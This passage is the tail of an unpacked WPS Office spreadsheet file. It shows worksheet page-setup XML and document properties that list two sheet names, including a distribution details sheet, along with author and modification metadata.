  <pageMargins left="0.747916666666667" right="0.747916666666667" top="0.984027777777778" bottom="0.984027777777778" header="0.510416666666667" footer="0.510416666666667"/>
  <pageSetup paperSize="9" scale="75" firstPageNumber="4294963191" orientation="landscape" useFirstPageNumber="1" horizontalDpi="180" verticalDpi="180"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Application>WPS Office 个人版</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="2" baseType="lpstr">
      <vt:lpstr>Recovered_Sheet1</vt:lpstr>
      <vt:lpstr>发放明细表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dc:creator>
  <cp:lastModifiedBy>孤岛</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-11-24T00:28:00Z</dcterms:created>
  <cp:lastPrinted>2019-01-30T08:27:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-09T00:39:24Z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KSOReadingLayout">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>83CDCF8DE34140C28BFEF10AD34543FE</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>